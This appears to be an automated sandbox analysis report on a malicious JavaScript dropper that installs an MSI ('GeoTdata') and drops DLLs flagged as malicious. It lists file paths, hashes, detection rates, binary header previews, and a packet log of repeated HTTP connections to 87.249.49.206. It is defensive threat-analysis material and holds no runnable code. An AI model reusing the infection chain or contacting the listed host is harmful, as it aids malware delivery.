                                                                Preview:p...... ..............(....................................................... ........M.........(.....wl....i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".b.3.6.8.5.3.8.5.a.4.7.f.d.a.1.:.0."...

                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C5C8CC0A7FE31816B4641D0465402560

                                                                Download File
                                                                Process:C:\Windows\System32\wscript.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):264
                                                                Entropy (8bit):3.10545065785345
                                                                Encrypted:false
                                                                SSDEEP:6:kKTWBE/6WFkYGhipWhliK8al0GQcmqe3KQjMIXIXL/:LpiYkYGIWzyZ3qe3KQjxXIT
                                                                MD5:820EFF906B9DB3086A58B04B4DC827D0
                                                                SHA1:ADC454962D16EDB43ED8F7F544B452C2C7CB5C68
                                                                SHA-256:9D065EE643044DFAEF426890E13D54750C03E786E5304F1EC8E7A85F9A4679C3
                                                                SHA-512:972A0CC57A23C932CE34A7E9D1BE035BE4D4B16B68C5693225E4A70C133CFD4404575B43C51D734FE91905D42E063298382630773A2602202C35FB5BFA88D6C7
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:p...... ....v..........(....................................................... ...............(.............v...h.t.t.p.:././.s.e.c.u.r.e...g.l.o.b.a.l.s.i.g.n...c.o.m./.c.a.c.e.r.t./.c.o.d.e.s.i.g.n.i.n.g.r.o.o.t.r.4.5...c.r.t...".6.2.f.a.4.8.4.5.-.5.7.6."...

                                                                C:\Users\user\AppData\Local\sharepoint\forcedelctl.dll

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):978944
                                                                Entropy (8bit):7.28721441662179
                                                                Encrypted:false
                                                                SSDEEP:24576:rs6ZRS5J3ifJvlxfcdaeti7w+0bf0XznPMvPD:Yni8dK9CEMXD
                                                                MD5:B28A478EB5B99EFCDC7CAF428BFFB89A
                                                                SHA1:D394C7B8FE15753BFBFF79FB4F648F6F8BAE70F9
                                                                SHA-256:3BCA1DCAEF4430272B9029C9A4BC8BE0D45ECFF66E8DE8679ED30D8AFAB00F6F
                                                                SHA-512:DECB2581F64949BFAAAF0368917F0705D7A4B7392EC272EDA025CF06A4384EC4CDD5202081C2E085F00645029DD96BFEF262E8628BED1861185ADF6281C1CC88
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 11%
                                                                • Antivirus: Virustotal, Detection: 13%, Browse
                                                                Joe Sandbox View:
                                                                • Filename: avp.msi, Detection: malicious, Browse
                                                                Reputation:low
                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....A._.................,...........G.......P.......................................b..................................~.......v)......P........................h......................................................d............................text....0.......".................. ....itext.......@.......&.............. ..`.data.... ...P... ...0..............@....bss.....`...p...`...P...................idata...0.......*...P..............@....edata...............z..............@..@.reloc...p.......j...|..............@..B.rsrc...P...........................@..@....................................@..@........................................................................................................................................

                                                                C:\Windows\Installer\62df95.msi

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {117CFEB2-6376-4FA5-ACE4-CD1494F2E3DD}, Number of Words: 10, Subject: GeoTdata, Author: Since Flawer, Name of Creating Application: GeoTdata, Template: ;1033, Comments: This installer database contains the logic and data required to install GeoTdata., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                Category:dropped
                                                                Size (bytes):1427968
                                                                Entropy (8bit):7.426359534364663
                                                                Encrypted:false
                                                                SSDEEP:24576:BqKxnNTYUx0ECIgYmfLVYeBZr7A9zdfoAX+8UhxcS:Bq6TYCZKumZr7ARdAAO8oxz
                                                                MD5:4D81BE09C23E02FAB7364E508C21C111
                                                                SHA1:52CAE521D7A808C8206F4B5AFD6B037BC573B50E
                                                                SHA-256:DCAE57EC4B69236146F744C143C42CC8BDAC9DA6E991904E6DBF67EC1179286A
                                                                SHA-512:4F5B4FDEB9A056025455EDE8EE6E1757DA8DB64F9692DF2A46558A3C04AAEC551734B4D75803BBD579E1163B9ABA5005F71C5EFB22EE3D336779804A11B2B5A5
                                                                Malicious:false
                                                                Preview:......................>.......................................................D.......`......................................./...0...1...2...3...4...5...6...7...........................................................................................................................................................................................................................................................................................................................................................................;...........!...3............................................................................................... ...+..."...#...$...%...&...'...(...)...*...1...,...-......./...0...4...2...:...?...5...6...7...8...9...>...<.......=...........@...A...B...C...........F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                C:\Windows\Installer\MSIE1A8.tmp

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):446944
                                                                Entropy (8bit):6.403916470886214
                                                                Encrypted:false
                                                                SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                Joe Sandbox View:
                                                                • Filename: avp.msi, Detection: malicious, Browse
                                                                • Filename: sharepoint.msi, Detection: malicious, Browse
                                                                • Filename: slack.msi, Detection: malicious, Browse
                                                                • Filename: out_bdrts.js, Detection: malicious, Browse
                                                                • Filename: font.msi, Detection: malicious, Browse
                                                                • Filename: Letter_q50_63b944998-11n0283407179-6803z4.js, Detection: malicious, Browse
                                                                • Filename: upd.msi, Detection: malicious, Browse
                                                                • Filename: Doc_i93_65b929565-14q83944h2246-4336m9.js, Detection: malicious, Browse
                                                                • Filename: Doc_i93_65b929565-14q83944h2246-4336m9.js, Detection: malicious, Browse
                                                                • Filename: SecuriteInfo.com.Trojan.Generic.35319809.8233.9994.msi, Detection: malicious, Browse
                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                C:\Windows\Installer\MSIE3CC.tmp

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):446944
                                                                Entropy (8bit):6.403916470886214
                                                                Encrypted:false
                                                                SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                Joe Sandbox View:
                                                                • Filename: avp.msi, Detection: malicious, Browse
                                                                • Filename: sharepoint.msi, Detection: malicious, Browse
                                                                • Filename: slack.msi, Detection: malicious, Browse
                                                                • Filename: out_bdrts.js, Detection: malicious, Browse
                                                                • Filename: font.msi, Detection: malicious, Browse
                                                                • Filename: Letter_q50_63b944998-11n0283407179-6803z4.js, Detection: malicious, Browse
                                                                • Filename: upd.msi, Detection: malicious, Browse
                                                                • Filename: Doc_i93_65b929565-14q83944h2246-4336m9.js, Detection: malicious, Browse
                                                                • Filename: Doc_i93_65b929565-14q83944h2246-4336m9.js, Detection: malicious, Browse
                                                                • Filename: SecuriteInfo.com.Trojan.Generic.35319809.8233.9994.msi, Detection: malicious, Browse
                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                C:\Windows\Installer\MSIE3ED.tmp

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):446944
                                                                Entropy (8bit):6.403916470886214
                                                                Encrypted:false
                                                                SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                C:\Windows\Installer\MSIE40D.tmp

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):446944
                                                                Entropy (8bit):6.403916470886214
                                                                Encrypted:false
                                                                SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                C:\Windows\Installer\MSIEA76.tmp

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):1884
                                                                Entropy (8bit):5.496901074166662
                                                                Encrypted:false
                                                                SSDEEP:48:7OMqKNHOWa0S+5Lni/6ctKuP3IiFLpWN5xOLZpNnD8SfWwhie:7O/+OvdycBXFdWNaZpNRfWwQe
                                                                MD5:E28682DCC842E05B0448D7F557F00541
                                                                SHA1:7C7D3B0EF3C3AF9906C8FEF3EDB4105ECE266C59
                                                                SHA-256:0FF05A56EC55B72E2B5EA200E6A5380D8F3E926964EE6EE56285CE99AC916141
                                                                SHA-512:8EA35F0E4E86A457195553CFE11A7A7A9008C1BCDFD26E8FDFD236BC91CB2E20A9DE147CF75BCC49AE9D082B817C9E1DA1444F313063B98C04497864302F1A34
                                                                Malicious:false
                                                                Preview:...@IXOS.@.....@w..X.@.....@.....@.....@.....@.....@......&.{52EF198D-0C6C-406A-803F-F86D93DD7930}..GeoTdata..avp.msi.@.....@.....@.....@........&.{117CFEB2-6376-4FA5-ACE4-CD1494F2E3DD}.....@.....@.....@.....@.......@.....@.....@.......@......GeoTdata......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}8.C:\Users\user\AppData\Roaming\Since Flawer\GeoTdata\.@.......@.....@.....@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}*.01:\Software\Since Flawer\GeoTdata\Version.@.......@.....@.....@......&.{698ED6C9-206D-4BB6-BF3D-8CF082F29629}+.C:\Users\user\AppData\Local\New Folder\.@.......@.....@.....@......&.{166D45B5-D23D-467B-BBDE-9EF5A3B91CB0}:.C:\Users\user\AppData\Local\sharepoint\forcedelctl.dll.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".8.C:\Users\user\AppData\Roaming\Since

                                                                C:\Windows\Installer\SourceHash{52EF198D-0C6C-406A-803F-F86D93DD7930}

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):49152
                                                                Entropy (8bit):0.7677779613685646
                                                                Encrypted:false
                                                                SSDEEP:12:JSbX72Fj4l/iAGiLIlHVRpqh/7777777777777777777777777vDHFbIMIMpZl0G:JaQQI56J5INF
                                                                MD5:D9AEE1ADF6231A8B45AFE7915E02FBFC
                                                                SHA1:F3FED86BD467646AB334BBD9206DD370D5B53FB9
                                                                SHA-256:828E76BA3A58BCB3CBBA651E638DFD5C32934375F29798E398237F7E7C614EEC
                                                                SHA-512:CF2B92F7B70D267FC68D9C1031C578E7D2D7377258E10C6A2B02485137AE37B899FD31669A6B85AA473C4B3116C20BC40F49D7EE3457611E617146011F824605
                                                                Malicious:false
                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Windows\Installer\inprogressinstallinfo.ipi

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):32768
                                                                Entropy (8bit):1.2317980824098969
                                                                Encrypted:false
                                                                SSDEEP:48:cGBueNvcFXOPT5LkYkBR/QSfAEbCyKT9mS7TiP:jBySTuYkBR/QpwCHm/
                                                                MD5:530CAF691765DD992F08A5A0C775890C
                                                                SHA1:A89E039347B946741B899F0C7B3FDD8344E97F7A
                                                                SHA-256:4F54F3D4E1AB5BE3F5231E2D5EBF9E16F2729709EC84024105A104E61FCDA509
                                                                SHA-512:DA46F0734A9DC70DF37DA2D3A65C98721E80A03B2D6C469642A02F79A60B8BF29261284845D9EEA48C7DE12940801A73A4A507E5A2A7B42A40692657FFCA968E
                                                                Malicious:false
                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Windows\Temp\~DF3720980220C5D330.TMP

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):81920
                                                                Entropy (8bit):0.11497847911231225
                                                                Encrypted:false
                                                                SSDEEP:24:SPaaFTxk4ipVkCk4ipVkaAEVkyjCyKTV3+bpGHpgJ+Okg:SPLTVSLSfAEbCyKT9NgJpkg
                                                                MD5:0EC59E12271D291A58C1222B66C212A7
                                                                SHA1:2F391D678D5DA9BF3858CEC0D0B1E07630F00ED2
                                                                SHA-256:E4D1DE79DFC72D78DF7263C87CA02435C9D387501AB62C26EC382FBF89248DE5
                                                                SHA-512:4922C593218A60ED227587987BFB907AE474F40EE93392C579B710A465AB8852782B9849A8689E2BA509D968EF02EA6C17E4C2F34B4B9CB3EB023A9F2AFEA5F2
                                                                Malicious:false
                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Windows\Temp\~DF69EE188A303BA986.TMP

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):32768
                                                                Entropy (8bit):1.2317980824098969
                                                                Encrypted:false
                                                                SSDEEP:48:cGBueNvcFXOPT5LkYkBR/QSfAEbCyKT9mS7TiP:jBySTuYkBR/QpwCHm/
                                                                MD5:530CAF691765DD992F08A5A0C775890C
                                                                SHA1:A89E039347B946741B899F0C7B3FDD8344E97F7A
                                                                SHA-256:4F54F3D4E1AB5BE3F5231E2D5EBF9E16F2729709EC84024105A104E61FCDA509
                                                                SHA-512:DA46F0734A9DC70DF37DA2D3A65C98721E80A03B2D6C469642A02F79A60B8BF29261284845D9EEA48C7DE12940801A73A4A507E5A2A7B42A40692657FFCA968E
                                                                Malicious:false
                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Windows\Temp\~DF9765868AA176CF13.TMP

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):512
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3::
                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                Malicious:false
                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Windows\Temp\~DFC54E4DE2E11D7059.TMP

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):32768
                                                                Entropy (8bit):0.06852365326645236
                                                                Encrypted:false
                                                                SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOR5I9ZX8IEVk6Vky6lZ:2F0i8n0itFzDHFbIMIFZ
                                                                MD5:480AB16535BE654C5B9E3245BBF198CC
                                                                SHA1:98EAA2DD325A067685AE89D0E45FDD0B89E065D4
                                                                SHA-256:FD5293DCAE83F1A5505360681DA2D37638B75717FC68E3A11EE806958FD6A5CF
                                                                SHA-512:3EA01DE5CBE173D5ECF443E39C180AC8A909A3B5E2B849C1C6DE84ED31F7FBE8C6B3D296E66B7FFBA26852D63E9B8594CCFAA22AED24AE2CDFC17CDEB3D369B8
                                                                Malicious:false
                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                Static File Info

                                                                General

                                                                File type:ASCII text, with very long lines (547), with CRLF line terminators
                                                                Entropy (8bit):4.47494445264349
                                                                TrID:
                                                                  File name:Doc_m42_81h118103-88o62135w8623-1999q9.js
                                                                  File size:883'252 bytes
                                                                  MD5:d174e68fe3458262e53dee5036eeb15e
                                                                  SHA1:9629e313a6299e600ff2c6086a24e3ad6ff6ba59
                                                                  SHA256:092962bc268390debf17cd148d03147cdf919e442e61c92de01eac3bdb34b1c1
                                                                  SHA512:cdb7e3928f25f5efa3a6570f01b59908dacc288230d9ef92b2269035f9c0d50cde4a7af3916fcc0424b8eef20bce3b6374086daefab73370fe26e37367eff73a
                                                                  SSDEEP:12288:r0PIO52rUkKgsPBQtW9iAm4pc6bD4QscB4gefCsDIP4lU:r3OdkFsmt0iAHNbMQsq4golEOU
                                                                  TLSH:A1156B60FE4511661E83679F9C6216D2FD2CC21193022228E99E439D1F875ECD3BDBAF
                                                                  File Content Preview:..// jolliness Mocha canon Hetty Asiatical browman autotropism Camorra printscript aboveproof fetiferous blepharotomy unfelted Iberia theatrician bedumb debarration chambrel olomao unchurched ascendingly mockernut Cretan retroactively deweylite breadwinne

                                                                  File Icon

                                                                  Icon Hash:68d69b8bb6aa9a86

                                                                  Network Behavior

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Apr 17, 2024 16:51:31.147830009 CEST4971280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:31.394702911 CEST804971287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:31.394817114 CEST4971280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:31.395070076 CEST4971280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:31.683490992 CEST804971287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:31.756604910 CEST804971287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:31.756629944 CEST804971287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:31.757029057 CEST4971280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:31.757029057 CEST4971280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:32.005311012 CEST804971287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:35.419711113 CEST4971380192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:35.664653063 CEST804971387.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:35.664813042 CEST4971380192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:35.664994001 CEST4971380192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:35.950237036 CEST804971387.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:36.025803089 CEST804971387.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:36.025876045 CEST4971380192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:36.026025057 CEST4971380192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:36.190332890 CEST4971480192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:36.270831108 CEST804971387.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:36.431092024 CEST804971487.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:36.431184053 CEST4971480192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:36.431360960 CEST4971480192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:36.712044001 CEST804971487.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:36.784861088 CEST804971487.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:36.784873962 CEST804971487.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:36.784919977 CEST4971480192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:36.785017014 CEST4971480192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:36.820319891 CEST4971680192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:37.025823116 CEST804971487.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:37.061239004 CEST804971687.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:37.061333895 CEST4971680192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:37.061486959 CEST4971680192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:37.344546080 CEST804971687.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:37.421343088 CEST804971687.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:37.421361923 CEST804971687.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:37.421541929 CEST4971680192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:37.421636105 CEST4971680192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:37.448229074 CEST4971780192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:37.451210022 CEST4971880192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:37.662733078 CEST804971687.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:37.691889048 CEST804971887.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:37.692133904 CEST4971880192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:37.692135096 CEST4971880192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:37.695048094 CEST804971787.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:37.695123911 CEST4971780192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:37.695229053 CEST4971780192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:37.976241112 CEST804971887.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:37.982114077 CEST804971787.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:38.048165083 CEST804971887.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:38.048182011 CEST804971887.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:38.048379898 CEST4971880192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:38.048379898 CEST4971880192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:38.052789927 CEST804971787.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:38.052969933 CEST4971780192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:38.052969933 CEST4971780192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:38.059204102 CEST4971980192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:38.163165092 CEST4972080192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:38.289866924 CEST804971887.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:38.299674988 CEST804971787.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:38.300785065 CEST804971987.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:38.300956011 CEST4971980192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:38.301042080 CEST4971980192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:38.408001900 CEST804972087.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:38.408148050 CEST4972080192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:38.408371925 CEST4972080192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:38.585995913 CEST804971987.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:38.663029909 CEST804971987.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:38.663050890 CEST804971987.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:38.663167953 CEST4971980192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:38.663244009 CEST4971980192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:38.694252014 CEST804972087.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:38.761814117 CEST804972087.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:38.761835098 CEST804972087.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:38.762017965 CEST4972080192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:38.762084961 CEST4972080192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:38.765361071 CEST4972180192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:38.904409885 CEST804971987.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:39.007702112 CEST804972087.249.49.206192.168.2.6
